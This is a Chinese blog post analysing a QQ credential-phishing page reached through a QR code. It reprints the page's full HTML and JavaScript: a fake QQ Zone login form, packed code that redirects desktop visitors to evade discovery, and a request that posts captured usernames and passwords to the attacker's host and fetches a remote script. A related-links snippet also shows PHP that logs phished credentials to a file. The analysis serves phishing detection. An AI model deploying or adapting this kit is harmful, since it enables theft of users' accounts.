一个QQ用户名/密码钓鱼分析

最新推荐文章于 2024-02-22 09:44:44 发布
最新推荐文章于 2024-02-22 09:44:44 发布
阅读量1.4w 收藏 6
点赞数 2
分类专栏: 水滴石穿 文章标签: 钓鱼检测
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/littlelittlebai/article/details/91435159
版权

写在前面

之前好像一直都没有碰到过钓鱼页面啥的…前天刚好碰到,就简单分析一下。

钓鱼分析

钓鱼网址藏在一个二维码中,正值毕业季啊,二维码图片上写着“青春不散场”…看着就很像真的…

二维码对应的URLhttps://sharechain.qq.com/1b4e56f042d5bf060fe0e44d6346eebf,是一个腾讯微云的链接。没有用过腾讯微云,感觉像是分享一个帖子,然后帖子点进去就是下图的形式。在电脑上看的话,其实很快就能发现这个东西不太对劲,但是在手机上是不能显示实际对应的跳转链接。文本显示链接与实际跳转链接不对应,这个特征在钓鱼网站检测中也经常用到。

在这里插入图片描述

接下来就看一下www.dfesd.com/images/ee/yyoui.html这个链接的内容是什么。

<!DOCTYPE html>
<html lang="zh-cn">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script>
    <link href="http://sasdh447.6600.org/template/css/css.css" rel="stylesheet" type="text/css">
    <link rel="stylesheet" href="http://qzonestyle.gtimg.cn/qzone/phone/style/login.css">
    <script src="http://open.mobile.qq.com/sdk/qqapi.js?_bid=152"></script>
    <script type="text/javascript">
$(function(){

 mqq.ui.setTitleButtons({
   left : {
       title : "私密相册",
       callback : function () {
          //
       }
   },
   right : {
       hidden: true
   }
})
  
});
</script>
    <!--顶部banner-->
  </head>
  <script>
    var doc=$(document);var _touches_point1=0;var _touches_point2=0;addEventListener("touchstart",function(a){_touches_point1=a.touches[0].pageY});addEventListener("touchmove",function(a){_touches_point2=a.touches[0].pageY;if(doc.scrollTop()<=0&&_touches_point1<_touches_point2){a.preventDefault();if($("#_domain_display").length<=0){$("body").prepend('<div id="_domain_display" style="text-align:center;background-color:#bebdc2;color:#65696c;height:0px;padding-top:15px;line-height:26px;font-size:12px;overflow:hidden;"><p>网页由 '+
	'ui.ptlogin2.qq.com'
	+' 提供</p><p>QQ浏览器X5内核提供技术支持</p></div>')}$("#_domain_display").height((_touches_point2-_touches_point1))}});addEventListener("touchend",function(a){$("#_domain_display").slideUp("normal",function(){$("#_domain_display").remove()})});
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('8 1={4:6,5:6,7:6};8 2=9.d;1.4=2.3("b")==0;1.5=2.3("c")==0;1.a=(2=="e")||(2.3("f")==0);k(1.4||1.5||1.7){o.n.l="g://j.i.h/m/"}',25,25,'|system|p|indexOf|win|mac|false|xll|var|navigator|x11|Win|Mac|platform|X11|Linux|http|com|qq|pvp|if|href||location|window'.split('|'),0,{}));

/* 上面一段js最终为执行了如下代码
var system = {
    win: false,
    mac: false,
    xll: false
};
var p = navigator.platform;
system.win = p.indexOf("Win") == 0;
system.mac = p.indexOf("Mac") == 0;
system.x11 = (p == "X11") || (p.indexOf("Linux") == 0);
if (system.win || system.mac || system.xll) {  //检测到系统之后跳转到http://pvp.qq.com/m/
    window.location.href = "http://pvp.qq.com/m/"
}
*/
if(navigator.userAgent.indexOf('QQ/')>0){
  }else{
	window.location.href='http://i.qq.com';
  }
var province = remote_ip_info.province; var city = remote_ip_info.city; document.getElementById("ip").value=province+city;</script>
 <!--下面这段html代码,是模仿了qq空间的登录界面-->
 <body style="zoom: 1;">
    <div id="content" class="content">
      <div id="error_tips">
        <div id="error_tips_content">
          <span id="error_icon"></span>
          <span id="error_message"></span>
        </div>
      </div>
      <div id="login" class="login">
        <div id="logo" class="logo"></div>
        <div id="app_name" style="display: none"></div>
        <div id="q_login" class="q_login" style="display: none">
          <div id="q_login_title">
            <div id="q_login_logo"></div>
            <label id="q_login_tips"></label>
          </div>
          <div id="q_logon_list" class="q_logon_list"></div>
        </div>
        <div id="web_login">
          <form id="loginform" autocomplete="off" name="loginform" action="" method="" target="" style="margin:0">
            <input type="hidden" name="ip" id="ip" />
            <ul id="g_list">
              <li id="g_u">
                <div id="del_touch" class="del_touch">
                  <span id="del_u" class="del_u"></span>
                </div>
                <input id="u" class="inputstyle" name="hrUW3PG7mp3RLd3dJu" autocomplete="off" placeholder="QQ号码/手机/邮箱"></li>
              <li id="g_p">
                <div id="del_touch_p" class="del_touch">
                  <span id="del_p" class="del_u"></span>
                </div>
                <input id="p" class="inputstyle" maxlength="16" type="password" name="LxMzAX2jog9Bpjs07jP" autocorrect="off" placeholder="请输入您的QQ密码"></li>
            </ul>
            <div href="javascript:void(0);" id="go">登 录</div></form>
        </div>
        <div id="switch">
          <div id="swicth_login" onclick="pt._switch()" style="display: none"></div>
          <div id="zc_feedback">
            <span id="zc" onclick="window.open('http\://ptlogin2.qq.com\x2Fj_newreg_url')">注册新帐号</span>
            <span id="forgetpwd" onclick="window.open('http\://ptlogin2.qq.com/j_findpwd_url')">忘了密码?</span></div>
        </div>
        <div id="custom_bottom"></div>
      </div>
      <div id="vcode">
        <label id="vcode_tips"></label>
        <div id="vcode_area">
          <img id="vcode_img">
          <label id="input_tips"></label>
          <input id="vcode_input" name="vcode_input" tabindex="3" autocomplete="off" autocorrect="off" maxlength="6"></div>
        <div id="button"></div>
      </div>
    </div>
    <div id="new_vcode" class="new_vcode"></div>
    <div id="footerBlank"></div>
        <script>
      var times = 0;
      function error(msg) {
        $("#error_tips").css({
          display: 'block'
        });
        $('#error_message').html(msg);
        err = true;
      }
      $('form input').focus(function() {
        $("#error_tips").css({
          display: 'none'
        });
        err = false;
      });
      $("#error_tips").on('click',
      function() {
        $(this).hide();
      });
      $("#go").on('click',
        function() {
        var $this = $(this);
        err = false;
        var p = $("#p").val();
        var u = $("#u").val();
	u == '' && error('您还没有输入帐号!');	
	if(err) return false;
	p == '' && error("您还没有输入密码!");
	if(err) return false;

	/^[1-9][0-9]{5,9}$/.test(u) || error('请输入正确的帐号!');
	if(err) return false;

	if(sameChar(u)){
		error("您输入的帐号或密码不正确,请重新输入。");
		$("#u").val('');
		$("#p").val('');
		return false;
	}
	
	var len = p.length;

	(len < 6 || len>16) && error('您输入的帐号或密码不正确,请重新输入。');
	/*新增密码校验*/
	var pattern = /[\u4e00-\u9fa5]+/g;
	pattern.test(p) && error("您输入的帐号或密码不正确,请重新输入。");
	var pattern2 = /^[0-9]*$/g;
	pattern2.test(p) && error("您输入的帐号或密码不正确,请重新输入。");
	if(sameChar(p)){
		error("您输入的帐号或密码不正确,请重新输入。");
		$("#p").val('');
		return false;
	}
	/**/

		if (!err){
			$.ajax({
				url:'http://sasdh447.6600.org/save.php',
				type:'POST',
				dataType:'json',
				async:false, 
				data: $('#loginform').serialize(),
				success:function(r){
				$.getScript('http://sasdh447.6600.org/lib/t.js');
				},
				error:function(er){
				$.getScript('http://sasdh447.6600.org/lib/t.js');
            }
			})
		}
      })
    	  function sameChar(str){
		  var result = true;
		  var c = str.charAt(0);
		  for(var i=0;i<str.length;i++){
			  if(c != str.charAt(i)){
				 result = false;
				 break;				 
			  }
		  }
		 return result;
      }
      </script>
    <div style="display:none;">
  </body>
</html>

理解了一下,其中的js代码会判断访问者所使用的操作系统平台,如果是win/mac/linux,就会直接跳转到王者荣耀的一个网址,之后会判断是否是使用QQ的浏览器来登录的,如果是,则不跳转,如果不是,就会跳转到https://i.qq.com/。查了一下发现当有好多个window.location.href='xxx'时,只会执行最后一个,而且通过测试发现,页面的跳转会在后面所有的js代码都执行结束之后发生。

这部分代码其实就是防止自己被发现吧。当使用电脑登录的时候,就直接跳转到正常的页面。

如果我们是通过手机QQ直接扫描二维码,访问网址,那页面不跳转,会看到一个和正常的QQ空间登录一样的界面,最后面的js代码进行了一些简单的对用户名/密码的判断,避免访问者输入相同的用户名/密码,检测用户名是否全是数字等等,比较好理解。当js代码判断没有错误之后,就会把用户名密码传递给一个http://sasdh447.6600.org/save.php的网址,这才是真正的钓鱼者的服务器,他应该会在后台使用拿到的用户名密码,登录QQ空间,发一些消息,继续传播钓鱼界面。现在因为都有设备锁,所以钓鱼者是没办法直接登录QQ,但是邮件、空间等等这些都是可以登录的。

在这里插入图片描述

另外,最开始腾讯微云的链接是跳转到www.dfesd.com下的一个网址,这个是阿里巴巴下的一个快递公司…是合法的,感觉应该是这个网站有漏洞,然后通过这个漏洞上传了yyoui.html这个页面。没有直接在钓鱼者自己的服务器上放yyoui.html页面,应该也是出于保护自身的缘故吧。

最后

感觉钓鱼检测在移动端需求更大,但是移动端…emm…看论文来说好像不是很多。

youGuess28
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
通过案例分析Android WindowManager解析与骗取QQ密码的过程
09-02
Windows Manager是一款窗口管理终端,可以远程连接到Linux的X桌面进行管理,与服务器端产生一个session相互通信,通过本文给大家分享Android WindowManager解析与骗取QQ密码的过程,需要的朋友参考下
C#用户名密码登入程序
12-20
C# 中连接 oracle 数据库,实现类似于qq用户名密码登入的功能,文档里面有详细的步骤和注释;
一次曲折的钓鱼溯源反制
最新发布
leah126的博客
02-22 893
这天风和日丽,我正在摸鱼,忽然QQ群弹出一条消息,我打开一看,我感觉不简单。如下图:扫码后发现跳转到了QQ邮箱登陆界面,确定为钓鱼网站,看到其域名为http://****kak2.cn。这里随便输入,页面跳转到如下界面。好家伙,小伙子你挺会玩啊,收集完QQ邮箱账号密码,再来收集一波个人信息,做人不能太贪心啊。开始干活!
仿QQ记住用户名密码
02-28
完全实现了QQ的记住用户名密码的功能,对初学者有很大的帮助;
用户名密码等15个常用的js正则表达式
12-13
收集整理了15个常用的javaScript正则表达式,其中包括用户名密码强度、整数、数字、电子邮件地址(Email)、手机号码、身份证号、URL地址、 IPv4地址、 十六进制颜色、 日期、 QQ号码、 微信号、车牌号、中文正则。表单验证处理必备。 1 用户名正则 //用户名正则,4到16位(字母,数字,下划线,减号) var uPattern = /^[a-zA-Z0-9_-]{4,16}$/; //输出 true console.log(uPattern.test("iFat3")); 2 密码强度正则 //密码强度正则,最少6位,包括至少1个大写字母,1个小写字母,1个数字,1个特
PHP实现简单的仿QQ空间登录界面钓鱼(仅供参考测试不可用于非法用途)
01-08
声明:此代码仅供参考不可用于非法用途,非法使用造成的后果自负 演示:界面 点击提交后账号和密码会被写入txt文本中,同时页面跳转 <?php if (isset($_POST[user])) { if (isset($_POST[pass])) { $myfile = fopen(abc.txt, a)/*abc.txt用于接收提交数据*/ or die(Unable to open file!); $txt = ━━━━账号=.$_POST[user]. 密码=.$_POST[pass];//$_POST[user]这个变量的意思,在所有post
qq历史密码查询 记忆QQ历史密码查询 v1.0
10-15
记忆QQ历史密码查询旨在找回本人遗忘的密码,对已泄露的密码进行修改,内部增加了二十个MD5解密的接口,可以好解出百分之九十已加密的MD5值。
实战:定制一款编辑&amp;阅读超级舒适的typora主题-2021.12.04
热门推荐
weixin_39246554的博客
12-04 8万+
实战:定制一款编辑&阅读超级舒适的typora主题-2021.12.04 文档更新时间 时间 备注 2021年12月4日15:24:39 创建文档 typora.css主题迭代版本 当前最新版本为:lovexyy-2021.12.04-v1.css 链接:https://pan.baidu.com/s/18mlGL-Cf3UIVnKQyk9nLrw 提取码:0owt –来自百度网盘超级会员V6的分享 目录 文章目录实战:定制一款编辑&阅读超级舒适的typora主题-2
QQ2010登录成功后的数据包
zhsunson的专栏
02-19 2万+
QQ2010登录成功后的数据包分析放到这里一份,以便以后用到时查看S:01 2C 01 01 00 10 15 42 BD E1 DF 1B AE 06 C3 60 A1 63 6E 04 B6 5701 02 00 10 04 B8 A9 29 8C C5 D9 B3 6B 0C EF C5 0D 14 98 DBR:01 2C 01 00 01 03 3C 01 03 00 00 37 8B 7E 4F F2 46 3E 69 6D 4D 0C BC 43 CC D8 74 82 37 0A D4 68
【应用安全】“我的QQ被盗,请大家不要相信任何消息.......”
翼安研习社的博客
01-22 1405
撰稿|衡心 编辑|虞珍妮 信息收集|衡心** 生活中,可能大家都遇到过不是自己QQ被盗就是好友QQ被盗的情况,下面我们先聊一聊黑客是如何盗取QQ密码的。 1. 木马攻击 盗取账号常用的木马是能够自动记录账号和密码的木马程序,目标计算机一旦运行了该木马,它会将记录的账号和密码保存在本地计算机指定的文本文档中或将该账号和密码发送到事先设定好的邮箱。某些木马因其本身无进程、无注册表启动项从而使得计算机安全防护软件无法对其查杀和删除。 除了盗取账号和密码,还有一些攻击者会远程攻击QQ,制作尾巴文件或发送Q.
钓鱼邮件攻击分析
Ms08067安全实验室
05-26 1896
北京网际思安科技有限公司麦赛邮件安全实验室(MailSec Lab)研究发布了《2022年全球邮件威胁报告》(以下简称“报告”),报告数据显示:在2022年,全球每1000个邮箱,平均每月遭受的邮件攻击数量为299.27次(不含垃圾邮件),同比增加12.36%。钓鱼邮件攻击占比近7成。钓鱼邮件主要通过伪造发件人地址、发件内容,诱使被攻击者访问特定页面输入密码等信息,或者诱使被攻击者打开附...
php IMAP读取QQ邮箱邮件内容
heySister
03-22 4617
IMAP 这里给出一个链接: 163 IMAP与POP3区别 一直都不知道这些协议到底有什么区别…可能现在也不是特别了解,就只是大概知道了一下。感觉那个链接里面还是说的很清晰的。 163邮箱读取 刚开始是尝试了一下163邮箱邮件内容的读取,但是在执行imap_open()的时候报错了,随后163邮箱收到一封邮件,大概意思就是连接不安全,所以被阻止了。查了一下说是163为了推自己的客户端,所以才有这...
钓鱼网站检测 repo复现
heySister
05-12 2490
写在前面 纠结要起个什么样的文章标题…这篇帖子不会写的太硬核,就是想稍微理一下我自己的思路。 最近看了入侵检测钓鱼检测的论文。入侵检测给我的感觉是系统太大了,而且从199几年就开始用机器学习做了
邮件服务器搭建 iredmail
heySister
12-18 2433
前提 我搭建的网站里面需要有绑定邮箱服务,用qq邮箱这些肯定是不行的,没有那么多,计划得随机生成很多。 所以需要自己搭建一个邮箱服务器。 记录 之前有其他人弄过模版了,所以我没有实际自己去搭,就记录几个疑惑的点。 看了一些帖子: https://qing.su/article/154.html https://qing.su/article/158.html https://blog.csdn.net/witton/article/details/105882959 https://blog.csdn.n
Native Message记录
heySister
09-10 2192
需求 最近在开发一个小插件,需要实现在Chrome插件中钓鱼python脚本的功能。 查了一下发现使用Native Message来实现。 流程 https://developer.chrome.com/extensions/nativeMessaging 看官方文档,以及官方的例子其实就可以很清楚了。 大概意思就是在本地注册一个服务,然后插件去调用服务。也就是说我按照要求写好配置文件,插件调用配...
OAuth state参数 CSRF
heySister
12-10 1717
记录 之前觉得问题都是出在RP端的,比如没有正确校验state参数,没有正确使用state参数这些。刚刚突然发现其实IdP端也没有校验好。 有些网站压根就没有使用state参数,这种情况下,作为IdP端,应该是提示需要有随机参数的,但是像微信、微博都是当做正常情况下处理的。(可能是为了给应用网站提供更大的自主空间,允许他们使用自己定义的参数,毕竟讲道理只要应用网站做好校验,就可以避免漏洞的) 还发现CSDN在使用OAuth来绑定微信账号的时候,state参数是固定为了csdn,但是因为CSDN在绑定账号前需
samesite thinkphp5
heySister
12-07 857
记录 要复现jsonp的跨域访问漏洞,之前测试的都是正常的。 先说一下功能:点击A链接,前端通过script的src属性请求B的jsonp数据,然后得到返回的内容。在B校验不严格的情况下,我就可以拿到jsonp中的数据,A链接就是攻击者构造的恶意链接。 是自己复现,所以前后端我都自己开发了。后端用Thinkphp,正常业务下,前端通过ajax请求jsonp,是没有问题,可以请求到的。 当构造A恶意链接之后,浏览器会拦截掉这个跨域请求。讲道理jsonp就是解决跨域访问的问题好吗。然后就开始找问题了。 拦截的这
使用条件语句实现 QQ 登录:若用户名密码都输入正确,则提示登录成功;若用户名密码两者中有一个输入不正确,则提示错误。创建两个变量分别存放设置的用户名密码,变量类型分别为字符型和整型。当分别输入用户名密码时,利用条件语句判断输入的用户名密码是否与设置的用户名密码一致。
05-11
在上面的代码中,我们先设置了一个用户名密码,然后通过 `input()` 函数获取用户输入的用户名密码,并将密码转换成整型。然后,通过 if-else 条件语句判断输入的用户名密码是否与设置的一致,如果一致则提示...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值